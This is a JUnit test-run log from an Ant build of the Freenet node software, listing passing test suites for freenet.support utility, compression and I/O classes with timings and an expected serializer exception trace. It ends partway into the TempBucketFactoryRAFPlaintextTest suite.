    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testAsyncQueueingManySmallDelayed took 8,025 sec
    [junit] Testcase: testQueueingSmallDelayed took 5,638 sec
    [junit] Testcase: testQueueingManySmallDelayed took 7,33 sec
    [junit] Testcase: testAsyncQueueingSmallDelayed took 5,054 sec
    [junit] Running freenet.support.MultiValueTableTest
    [junit] Testsuite: freenet.support.MultiValueTableTest
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,722 sec
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,722 sec
    [junit] 
    [junit] Testcase: testContainsElement took 0,025 sec
    [junit] Testcase: testGetArray took 0,009 sec
    [junit] Testcase: testGet took 0,008 sec
    [junit] Testcase: testPut took 0,007 sec
    [junit] Testcase: testClear took 0,008 sec
    [junit] Testcase: testKeys took 0,007 sec
    [junit] Testcase: testGetSync took 0,012 sec
    [junit] Testcase: testContainsKey took 0,012 sec
    [junit] Testcase: testCountAll took 0,009 sec
    [junit] Testcase: testGetAll took 0,026 sec
    [junit] Testcase: testRemoveElement took 0,02 sec
    [junit] Testcase: testIsEmpty took 0,013 sec
    [junit] Testcase: testRemove took 0,007 sec
    [junit] Testcase: testDifferentKeysSameElement took 0,004 sec
    [junit] Running freenet.support.MutableBooleanTest
    [junit] Testsuite: freenet.support.MutableBooleanTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,472 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,472 sec
    [junit] 
    [junit] Testcase: testMutableBoolean took 0,014 sec
    [junit] Running freenet.support.PrioritizedSerialExecutorTest
    [junit] Testsuite: freenet.support.PrioritizedSerialExecutorTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] [J1, J2, J3, J4]
    [junit] [JM]
    [junit] [JM, J8, JN]
    [junit] [JM, J8, JN, JP, JQ, J2, JO, JR]
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,789 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,789 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] [J1, J2, J3, J4]
    [junit] [JM]
    [junit] [JM, J8, JN]
    [junit] [JM, J8, JN, JP, JQ, J2, JO, JR]
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testRun took 0,296 sec
    [junit] Testcase: testRunPrio took 0,016 sec
    [junit] Running freenet.support.PrioritizedTickerTest
    [junit] Testsuite: freenet.support.PrioritizedTickerTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Starting Ticker
    [junit] Starting Ticker
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,215 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,215 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Starting Ticker
    [junit] Starting Ticker
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testDeduping took 0,266 sec
    [junit] Testcase: testSimple took 0,457 sec
    [junit] Running freenet.support.RandomArrayIteratorTest
    [junit] Testsuite: freenet.support.RandomArrayIteratorTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,625 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,625 sec
    [junit] 
    [junit] Testcase: testReset took 0,02 sec
    [junit] Testcase: testNoSuchElement took 0,002 sec
    [junit] Testcase: testReadonly took 0,005 sec
    [junit] Testcase: testDefaultOrder took 0,002 sec
    [junit] Running freenet.support.SentTimeCacheTest
    [junit] Testsuite: freenet.support.SentTimeCacheTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,481 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,481 sec
    [junit] 
    [junit] Testcase: testQueryAndRemove took 0,029 sec
    [junit] Testcase: testFifo took 0,004 sec
    [junit] Testcase: testMaxSize took 0,002 sec
    [junit] Running freenet.support.SerialExecutorTest
    [junit] Testsuite: freenet.support.SerialExecutorTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,7 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,7 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testBlocking took 0,284 sec
    [junit] Running freenet.support.SerializerTest
    [junit] Testsuite: freenet.support.SerializerTest
    [junit] java.lang.IllegalArgumentException: Cannot serialize an array of more than 255 doubles; attempted to serialize 256.
    [junit]     at freenet.support.Serializer.writeToDataOutputStream(Serializer.java:175)
    [junit]     at freenet.support.SerializerTest.testTooLongDoubleArray(SerializerTest.java:53)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit] Threw when too long; should be something about how the array is too long to serialize:
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,557 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,557 sec
    [junit] ------------- Standard Output ---------------
    [junit] Threw when too long; should be something about how the array is too long to serialize:
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] java.lang.IllegalArgumentException: Cannot serialize an array of more than 255 doubles; attempted to serialize 256.
    [junit]     at freenet.support.Serializer.writeToDataOutputStream(Serializer.java:175)
    [junit]     at freenet.support.SerializerTest.testTooLongDoubleArray(SerializerTest.java:53)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testTooLongDoubleArray took 0,036 sec
    [junit] Testcase: test took 0,048 sec
    [junit] Running freenet.support.ShortBufferTest
    [junit] Testsuite: freenet.support.ShortBufferTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,758 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,758 sec
    [junit] 
    [junit] Testcase: testShortBufferToString took 0,026 sec
    [junit] Testcase: testCopy took 0,003 sec
    [junit] Testcase: testByteArrayShortBuffer took 0,015 sec
    [junit] Testcase: testByteArrayIndexShortBuffer took 0,001 sec
    [junit] Testcase: testHashcode took 0,091 sec
    [junit] Testcase: testEquals took 0,001 sec
    [junit] Testcase: testDataInputStreamShortBuffer took 0,003 sec
    [junit] Testcase: testBadLength took 0,005 sec
    [junit] Running freenet.support.SimpleFieldSetTest
    [junit] Testsuite: freenet.support.SimpleFieldSetTest
    [junit] Starting iterator test
    [junit] Tests run: 37, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,849 sec
    [junit] Tests run: 37, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,849 sec
    [junit] ------------- Standard Output ---------------
    [junit] Starting iterator test
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testPutAndTPut_WithEmpty took 0,03 sec
    [junit] Testcase: testDirectSubsetNameIterator took 0,002 sec
    [junit] Testcase: testPutOverwrite_StringArray took 0,004 sec
    [junit] Testcase: testKeyIterator_String took 0,002 sec
    [junit] Testcase: testPut_StringSimpleFieldSet took 0,003 sec
    [junit] Testcase: testEmptyValue took 0,023 sec
    [junit] Testcase: testPut_StringBoolean took 0,089 sec
    [junit] Testcase: testPutAllOverwrite took 0,004 sec
    [junit] Testcase: testSplit took 0,002 sec
    [junit] Testcase: testSimpleFieldSet_StringBooleanBoolean took 0,002 sec
    [junit] Testcase: testToplevelKeyIterator took 0,002 sec
    [junit] Testcase: testPutOverwrite_String took 0,001 sec
    [junit] Testcase: testRemoveValue took 0,002 sec
    [junit] Testcase: testTPut_StringSimpleFieldSet took 0,002 sec
    [junit] Testcase: testKeyIterator took 0,002 sec
    [junit] Testcase: testPut_StringInt took 0,003 sec
    [junit] Testcase: testPutAppend took 0,004 sec
    [junit] Testcase: testSimpleFieldSetSubset_String took 0,003 sec
    [junit] Testcase: testRemoveSubset took 0,005 sec
    [junit] Testcase: testSimpleFieldSetPutSingle_StringString_WithTwoPairedMultiLevelChars took 0,001 sec
    [junit] Testcase: testSimpleFieldSetPutAppend_StringString_WithTwoPairedMultiLevelChars took 0,001 sec
    [junit] Testcase: testSimpleFieldSetPutAndGet_MultiLevel took 0,004 sec
    [junit] Testcase: testGetDoubleArray took 0,004 sec
    [junit] Testcase: testSimpleFieldSet_BufferedReaderBooleanBoolean took 0,001 sec
    [junit] Testcase: testNamesOfDirectSubsets took 0,002 sec
    [junit] Testcase: testBase64 took 0,033 sec
    [junit] Testcase: testKeyIterationPastEnd took 0,002 sec
    [junit] Testcase: testGetAll took 0,001 sec
    [junit] Testcase: testPut_StringDouble took 0,002 sec
    [junit] Testcase: testPut_StringChar took 0,001 sec
    [junit] Testcase: testPut_StringLong took 0,003 sec
    [junit] Testcase: testIsEmpty took 0,001 sec
    [junit] Testcase: testSimpleFieldSet_SimpleFieldSet took 0,002 sec
    [junit] Testcase: testGetIntArray took 0,009 sec
    [junit] Testcase: testPut_StringShort took 0,001 sec
    [junit] Testcase: testSimpleFieldSetPutAndGet_NoMultiLevel took 0,001 sec
    [junit] Testcase: testEndMarker took 0,002 sec
    [junit] Running freenet.support.SizeUtilTest
    [junit] Testsuite: freenet.support.SizeUtilTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,558 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,558 sec
    [junit] 
    [junit] Testcase: testFormatSizeLong_WithIntermediateValues took 0,033 sec
    [junit] Testcase: testFormatSizeLong took 0,004 sec
    [junit] Running freenet.support.SparseBitmapTest
    [junit] Testsuite: freenet.support.SparseBitmapTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,537 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,537 sec
    [junit] 
    [junit] Testcase: testContainsThrowsOnBadRange took 0,022 sec
    [junit] Testcase: testAdd took 0,007 sec
    [junit] Testcase: testClear took 0,001 sec
    [junit] Testcase: testCombineBackwards took 0,005 sec
    [junit] Testcase: testCombineMiddle took 0 sec
    [junit] Testcase: testIteratorDoubleRemove took 0,001 sec
    [junit] Testcase: testRemove took 0,001 sec
    [junit] Testcase: testCombineAdjacent took 0,001 sec
    [junit] Running freenet.support.TimeSortedHashtableTest
    [junit] Testsuite: freenet.support.TimeSortedHashtableTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,528 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,528 sec
    [junit] 
    [junit] Testcase: testAddRemoveTS took 0,059 sec
    [junit] Testcase: testBeforeInclusive took 0,001 sec
    [junit] Testcase: testPairs took 0,005 sec
    [junit] Testcase: testAddRemove took 0,002 sec
    [junit] Running freenet.support.TimeUtilTest
    [junit] Testsuite: freenet.support.TimeUtilTest
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,628 sec
    [junit] 
    [junit] Testcase: testFormatTime_LongIntBoolean_milliseconds took 0,108 sec
    [junit] Testcase: testFormatTime_Long took 0,001 sec
    [junit] Testcase: testFormatTime_LongIntBoolean_tooManyTerms took 0,001 sec
    [junit] Testcase: testFormatTime_LongIntBoolean_maxTerms took 0,001 sec
    [junit] Testcase: testFormatTime_KnownValues took 0,001 sec
    [junit] Testcase: testFormatTime_LongIntBoolean_MaxValue took 0,001 sec
    [junit] Testcase: testFormatTime_LongInt took 0,001 sec
    [junit] Running freenet.support.URIPreEncoderTest
    [junit] Testsuite: freenet.support.URIPreEncoderTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,076 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,076 sec
    [junit] 
    [junit] Testcase: testEncodeURI took 0,011 sec
    [junit] Testcase: testEncode took 2,128 sec
    [junit] Running freenet.support.URLEncoderDecoderTest
    [junit] Testsuite: freenet.support.URLEncoderDecoderTest
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,964 sec
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,964 sec
    [junit] 
    [junit] Testcase: testEncodeDecodeString_allChars took 3,832 sec
    [junit] Testcase: testEncodeForced took 0,055 sec
    [junit] Testcase: testDecodeWrongString took 0,001 sec
    [junit] Testcase: testDecodeWrongHex took 0,012 sec
    [junit] Testcase: testEncodeDecodeString_notSafeBaseChars took 0,003 sec
    [junit] Testcase: testTolerantDecoding took 0,001 sec
    [junit] Testcase: testEncodeDecodeString_notSafeAdvChars took 0,015 sec
    [junit] Running freenet.support.compress.Bzip2CompressorTest
    [junit] Testsuite: freenet.support.compress.Bzip2CompressorTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,657 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,657 sec
    [junit] 
    [junit] Testcase: testBzip2Compressor took 0,104 sec
    [junit] Testcase: testByteArrayDecompress took 0,569 sec
    [junit] Testcase: testBucketDecompress took 0,008 sec
    [junit] Testcase: testCompress took 0,227 sec
    [junit] Testcase: testCompressException took 0,098 sec
    [junit] Testcase: testDecompressException took 0,147 sec
    [junit] Running freenet.support.compress.GzipCompressorTest
    [junit] Testsuite: freenet.support.compress.GzipCompressorTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,709 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,709 sec
    [junit] 
    [junit] Testcase: testGzipCompressor took 0,108 sec
    [junit] Testcase: testByteArrayDecompress took 0,108 sec
    [junit] Testcase: testBucketDecompress took 0,002 sec
    [junit] Testcase: testCompress took 0,002 sec
    [junit] Testcase: testCompressException took 0,001 sec
    [junit] Testcase: testDecompressException took 0,014 sec
    [junit] Running freenet.support.compress.NewLzmaCompressorTest
    [junit] Testsuite: freenet.support.compress.NewLzmaCompressorTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 15,674 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 15,674 sec
    [junit] 
    [junit] Testcase: testNewLzmaCompressor took 0,105 sec
    [junit] Testcase: testByteArrayDecompress took 0,469 sec
    [junit] Testcase: testCompressException took 0,07 sec
    [junit] Testcase: testDecompressException took 0,089 sec
    [junit] Testcase: testRandomByteArrayDecompress took 14,453 sec
    [junit] Running freenet.support.io.ArrayBucketTest
    [junit] Testsuite: freenet.support.io.ArrayBucketTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,713 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,713 sec
    [junit] 
    [junit] Testcase: testReadExcess took 0,036 sec
    [junit] Testcase: testReuse took 0,05 sec
    [junit] Testcase: testReadEmpty took 0,001 sec
    [junit] Testcase: testReadWrite took 0,001 sec
    [junit] Testcase: testLargeData took 0,134 sec
    [junit] Testcase: testNegative took 0 sec
    [junit] Running freenet.support.io.ByteArrayRandomAccessBufferTest
    [junit] Testsuite: freenet.support.io.ByteArrayRandomAccessBufferTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,936 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,936 sec
    [junit] 
    [junit] Testcase: testArray took 7,385 sec
    [junit] Testcase: testClose took 0,003 sec
    [junit] Testcase: testSize took 0,003 sec
    [junit] Testcase: testFormula took 0,949 sec
    [junit] Testcase: testWriteOverLimit took 0,061 sec
    [junit] Running freenet.support.io.HeaderStreamsTest
    [junit] Testsuite: freenet.support.io.HeaderStreamsTest
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] Tests run: 19, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] 
    [junit] Testcase: testAugInputSkipAndRead0 took 0,031 sec
    [junit] Testcase: testAugInputSkipAndReadI took 0,001 sec
    [junit] Testcase: testAugInputSkipAndReadM took 0,001 sec
    [junit] Testcase: testAugInputSkipAndReadP took 0,001 sec
    [junit] Testcase: testAugInputSkipAndReadZ took 0,001 sec
    [junit] Testcase: testAugInputRead0 took 0,001 sec
    [junit] Testcase: testAugInputRead1 took 0,001 sec
    [junit] Testcase: testAugInputReadI took 0,001 sec
    [junit] Testcase: testAugInputReadM took 0,001 sec
    [junit] Testcase: testAugInputReadP took 0 sec
    [junit] Testcase: testAugInputReadZ took 0,001 sec
    [junit] Testcase: testDimOutputThrow0 took 0,01 sec
    [junit] Testcase: testDimOutputThrow1 took 0 sec
    [junit] Testcase: testDimOutputWrite0 took 0,001 sec
    [junit] Testcase: testDimOutputWrite1 took 0,001 sec
    [junit] Testcase: testDimOutputWriteI took 0 sec
    [junit] Testcase: testDimOutputWriteM took 0,001 sec
    [junit] Testcase: testDimOutputWriteP took 0,001 sec
    [junit] Testcase: testDimOutputWriteZ took 0 sec
    [junit] Running freenet.support.io.LineReadingInputStreamTest
    [junit] Testsuite: freenet.support.io.LineReadingInputStreamTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,595 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,595 sec
    [junit] 
    [junit] Testcase: testReadLineWithoutMarking took 0,107 sec
    [junit] Testcase: testBothImplementation took 0,001 sec
    [junit] Testcase: testReadLine took 0,002 sec
    [junit] Running freenet.support.io.PaddedEphemerallyEncryptedBucketTest
    [junit] Testsuite: freenet.support.io.PaddedEphemerallyEncryptedBucketTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12306789ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12366182ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,353 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,353 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12306789ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12366182ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testReadExcess took 8,164 sec
    [junit] Testcase: testReuse took 0,03 sec
    [junit] Testcase: testReadEmpty took 0,02 sec
    [junit] Testcase: testReadWrite took 0,008 sec
    [junit] Testcase: testLargeData took 1,625 sec
    [junit] Testcase: testNegative took 0,021 sec
    [junit] Running freenet.support.io.PooledFileRandomAccessBufferTest
    [junit] Testsuite: freenet.support.io.PooledFileRandomAccessBufferTest
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test6259209596810098373.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test33305219255342692.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test1003474985387376899.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test7751124920479986023.tmp
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,314 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,314 sec
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test6259209596810098373.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test33305219255342692.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test1003474985387376899.tmp
    [junit] DELETING FILE tmp.pooled-random-access-file-wrapper-test/test7751124920479986023.tmp
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testLock took 0,254 sec
    [junit] Testcase: testSimplePooling took 0,355 sec
    [junit] Testcase: testLockedNotClosableFromNotOpenFD took 0,006 sec
    [junit] Testcase: testLockedNotClosable took 0,004 sec
    [junit] Testcase: testLockBlocking took 0,12 sec
    [junit] Testcase: testLocksB took 0,005 sec
    [junit] Testcase: testArray took 7,335 sec
    [junit] Testcase: testClose took 0,076 sec
    [junit] Testcase: testSize took 0,098 sec
    [junit] Testcase: testFormula took 0,927 sec
    [junit] Testcase: testWriteOverLimit took 0,642 sec
    [junit] Running freenet.support.io.RandomAccessFileWrapperTest
    [junit] Testsuite: freenet.support.io.RandomAccessFileWrapperTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,092 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,092 sec
    [junit] 
    [junit] Testcase: testStoreTo took 0,387 sec
    [junit] Testcase: testArray took 7,213 sec
    [junit] Testcase: testClose took 0,008 sec
    [junit] Testcase: testSize took 0,009 sec
    [junit] Testcase: testFormula took 0,841 sec
    [junit] Testcase: testWriteOverLimit took 0,142 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketFactoryRAFEncryptedTest
    [junit] Testsuite: freenet.support.io.TempBucketFactoryRAFEncryptedTest
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 23,547 sec
    [junit] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 23,547 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testBucketToRAFFreeBucketWhileArray took 0,275 sec
    [junit] Testcase: testBucketToRAFWhileArray took 0,542 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileMigrateFirst took 1,146 sec
    [junit] Testcase: testBucketToRAFCallTwiceFile took 0,134 sec
    [junit] Testcase: testArrayMigration took 0,414 sec
    [junit] Testcase: testBucketToRAFCallTwiceArray took 0,008 sec
    [junit] Testcase: testBucketToRAFFreeWhileFileFreeRAF took 0,017 sec
    [junit] Testcase: testBucketToRAFFailure took 0,035 sec
    [junit] Testcase: testBucketToRAFFreeWhileFile took 0,008 sec
    [junit] Testcase: testBucketToRAFWhileFile took 1,017 sec
    [junit] Testcase: testBucketToRAFFreeWhileArray took 0,014 sec
    [junit] Testcase: testArray took 15,439 sec
    [junit] Testcase: testClose took 0,188 sec
    [junit] Testcase: testSize took 0,233 sec
    [junit] Testcase: testFormula took 1,887 sec
    [junit] Testcase: testWriteOverLimit took 1,668 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.support.io.TempBucketFactoryRAFPlaintextTest
